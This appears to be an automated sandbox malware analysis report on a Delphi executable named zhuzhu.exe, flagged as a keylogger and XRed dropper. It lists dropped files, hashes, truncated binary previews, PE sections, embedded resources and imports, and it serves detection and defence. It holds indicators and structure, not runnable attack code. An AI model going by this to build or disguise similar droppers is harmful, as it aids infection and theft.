                                                                                                                                                                    SSDEEP:98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
                                                                                                                                                                    MD5:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    SHA1:4F0548A2F6BF73A85FF17F40F420098019AC05FF
                                                                                                                                                                    SHA-256:D6A84954E038DDF4A0026705E0942FC003CFDC04E58F658A6BD9E89C37C57D18
                                                                                                                                                                    SHA-512:C573147ADFEBA7D313CC79498A1C107679F0E69805E3AA8260B3E57DBA282088BCA082536D7866D4708529BF8C3BEF56B2005BD9D59A870E3D29132F6FD3D897
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....R.d..................-...".....D.-.......-...@...........................Q......BQ..........@............................/..?....2.`.............P..)..../.............................../....................../..............................text.....-.......-................. ..`.itext..P.....-.......-............. ..`.data...x.....-.......-.............@....bss.....................................idata...?..../..@..................@....tls........../..........................rdata......../.....................@..@.reloc......../......./.............@..B.rsrc...`.....2.......1.............@..@..............Q.......P.............@..@................................................................................................

                                                                                                                                                                    C:\Users\user\Desktop\Logs\._cache_zhuzhu.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3414
                                                                                                                                                                    Entropy (8bit):5.497386323545744
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:L4/YPDzFRYSqpPDzFRYNdCqYPDwOPxFRYmqqfvPDwOPxFRYpTqhfvPDwOPxFRYpd:LFfkSgfkNs3kRW3k013k013k02
                                                                                                                                                                    MD5:8DF876CA67089004FF99717336C057D6
                                                                                                                                                                    SHA1:6B2E69A4D67E8C01C9C7E04F567C45A75A05C795
                                                                                                                                                                    SHA-256:33A69994FABF8A22CE4A1D75E4BDE967915040926E399E539440F4B83BAB3F98
                                                                                                                                                                    SHA-512:420A504019DD6488EEB378E9EDAEBBA0303F426AC73F1C00AB193FF7374794C61D399393EF2EDF518B38D7C9C596697FE0A31E5672A8CE4B0710EBEBA467C559
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:----------Raised Exception--------------29/12/2024 22:58:58.516----------------..Exception PID=3624 TID=5812 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------29/12/2024 22:58:58.516----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=3624 TID=5812 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------29/12/2024 22:58:58.532----------------..Exception PID=3624 TID=5812 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke

                                                                                                                                                                    C:\Users\user\Documents\DTBZGIOOSO\XZXHAVGRAG.xlsm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):18387
                                                                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                    C:\Users\user\Documents\DTBZGIOOSO\~$XZXHAVGRAG.xlsx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                    MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                    SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                    SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                    SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                    C:\Users\user\Documents\DTBZGIOOSO\~$cache1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):771584
                                                                                                                                                                    Entropy (8bit):6.641700569488142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IAr:ansJ39LyjbJkQFMhmC+6GD9/
                                                                                                                                                                    MD5:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    SHA1:7A3922C6DE7B42483E48644C917ADA5467FD1A44
                                                                                                                                                                    SHA-256:F2927C106573A6D3594AD58A3B5976C9E82964BF4D064821ABE4D3D58EF82479
                                                                                                                                                                    SHA-512:D6F0094332CE7D2C6CBC46B41EA71871DFDB9148F5C5E1C96C8F79E752543A59B6EF85FF6B26148A2ADBB605792392221383624087987BE280DC625A66048E78
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                    C:\Users\user\Downloads\inst.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4118496
                                                                                                                                                                    Entropy (8bit):7.743814085153487
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                    MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                    SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                    SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                    Entropy (8bit):4.465636444072328
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:ZIXfpi67eLPU9skLmb0b4wWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:qXD94wWlLZMM6YFHf+8
                                                                                                                                                                    MD5:4D0FA019644621173BF30EE2E5F0D7A5
                                                                                                                                                                    SHA1:9EC73E6923D5E6AA834CB29AD3271F30165D5D85
                                                                                                                                                                    SHA-256:F36AB6C525BBA0EFD3EEB3B46C2AAC4393BE5FF850DDC519399BB8C664A4EE6E
                                                                                                                                                                    SHA-512:A69252CE84E87E62542852190CDF726B96768571DF05D08D675716048E99E0D2F4D5EA5837E2FF44AC5E745396AF066ECC61564458DF550A075FDF520352C281
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.f.IoZ..............................................................................................................................................................................................................................................................................................................................................C..}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    \Device\Mup\localhost\pipe\atsvc

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:GLS_BINARY_LSB_FIRST
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4697
                                                                                                                                                                    Entropy (8bit):7.794032055726917
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:PXL+TRk2HuR0kbc4kKpefCQsdUIGTAvksU3vxZDYUbkh3oh:PXLH2jkPPxQ6A8k33vx9GhYh
                                                                                                                                                                    MD5:D56BDECDB16ED5ED496FFBFEB49FDA4B
                                                                                                                                                                    SHA1:D031F3D283CF1083BB9D1705E82C5D84F42C78EE
                                                                                                                                                                    SHA-256:B0F3E7D8D3112C7F64FE6A7F4264F0D79AAB045D8CA13AE26F62F32262D5C42A
                                                                                                                                                                    SHA-512:0D48934A0A78A98CBAF028D12EF4EC7019D9F96B3E1DE3A0422F4DA448B3BEA9B9C5123C2C6F32CE8E6ED70507409FE18F8BB11B78DC729C6C2342885CC9DBF6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....q.Db...7..^W..P................P............:......5_..)Z..$..b.v].S[.(.A..sI.....kRk!....q..N'...yq...*...i^....R.3............j....&.@....................T.........*%.....3......X.P.aX/..9l........v ..s\...F.3~.R..^..u.......w..!....\...d.[.../....s...N.'..Nz..M...........rl..w.x7...Y....;d.7......S.0F...bL...b#....R.f.nE<)Bl..Q.....N..D...K.....1.`R?..y[...4..3......}.'@v..p.!.{......_..g.G.!8....1....u...D..........k.RK.<.8|+a.....3 <J0.o./....'.......1Uk g.o...F.\8..2..../...o..N...I....|....v.2....B..a4S...S...<.w.#'J....j.).a.8...$/On.....M.Ge...+.9..vY..(8S...T}.\...AQ .(|D.g...o...I]...y.........K<..L.e....O.`....<...+.....u...J.. ..f..yJ.._....|-...i....U.t.#..}p3r.g.-...

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.174885705168195
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 92.26%
                                                                                                                                                                    • Win32 Executable Borland Delphi 7 (665061/41) 6.13%
                                                                                                                                                                    • Inno Setup installer (109748/4) 1.01%
                                                                                                                                                                    • InstallShield setup (43055/19) 0.40%
                                                                                                                                                                    • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                                                    File name:zhuzhu.exe
                                                                                                                                                                    File size:6'061'056 bytes
                                                                                                                                                                    MD5:675f03db23d403573a3a6f708a0e4369
                                                                                                                                                                    SHA1:78ee9afafe6bf18d2c42d816629b6f9ed1e3ea2f
                                                                                                                                                                    SHA256:ee4c8a187e1e1bd62abe49faece1f327dc7718c736dd1e427c025d73fa796cf8
                                                                                                                                                                    SHA512:c9055873fcbcefd7aeb8414627d4aa7645014bc2a609a4993317a45465a2ffdbeb38dbfb6c7677350203fe1e7d1f3906fc670ae74d1a75fbd91533044f513240
                                                                                                                                                                    SSDEEP:98304:unsmtk2asgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvD:wL8Z9HhxRVwJMAqoetRqA9D
                                                                                                                                                                    TLSH:7756BF61B682C832C1231A78DD1B93E5A875BF315F246987BBF53E0C7E3D5523828297
                                                                                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:dd9d5b5252b5b513

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x49ab80
                                                                                                                                                                    Entrypoint Section:CODE
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    push ebp
                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                    add esp, FFFFFFF0h
                                                                                                                                                                    mov eax, 0049A778h
                                                                                                                                                                    call 00007F9C7CDEFD5Dh
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    call 00007F9C7CE436A5h
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    mov edx, 0049ABE0h
                                                                                                                                                                    call 00007F9C7CE432A4h
                                                                                                                                                                    mov ecx, dword ptr [0049DBDCh]
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    mov edx, dword ptr [00496590h]
                                                                                                                                                                    call 00007F9C7CE43694h
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    call 00007F9C7CE43708h
                                                                                                                                                                    call 00007F9C7CDED83Bh
                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x51d248.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0xb00000x51d2480x51d400d3af718b802a6350311023a10c38abeaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                                                    RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                                                                    RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                                                                    RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                                                                    RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                                                                    RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                                                                    RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                                                    RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                                    RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                                                                    RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                                    RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                                                                    RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                                                                    RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                                                                    RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                                                                    RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                                    RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                                                                    RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                                    RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                                                                    RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.09943714821763602
                                                                                                                                                                    RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                                                                    RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                                                                    RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                                                                    RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                                                                    RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                                                                    RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                                                                    RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                                                                    RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                                                                    RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                                                                    RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                                                                    RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                                                                    RT_STRING0xb67b80xdcdata0.6
                                                                                                                                                                    RT_STRING0xb68940x320data0.45125
                                                                                                                                                                    RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                                                                    RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                                                                    RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                                                                    RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                                                                    RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                                                                    RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                                                                    RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                                                                    RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                                                                    RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                                                                    RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                                                                    RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                                                                    RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                                                                    RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                                                                    RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                                                                    RT_RCDATA0xb8e040x10data1.5
                                                                                                                                                                    RT_RCDATA0xb8e140x50b518PE32 executable (GUI) Intel 80386, for MS Windows0.4693317413330078
                                                                                                                                                                    RT_RCDATA0x5c432c0x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                                                                    RT_RCDATA0x5c43300x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                                                                    RT_RCDATA0x5c7f300x64cdata0.5998759305210918
                                                                                                                                                                    RT_RCDATA0x5c857c0x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                                                                    RT_RCDATA0x5c86d00x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccea40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                    RT_GROUP_CURSOR0x5cceb80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccecc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccee00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccef40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccf080x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccf1c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_ICON0x5ccf300x14dataTurkishTurkey1.1
                                                                                                                                                                    RT_VERSION0x5ccf440x304dataTurkishTurkey0.42875647668393785

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                                    user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                    advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
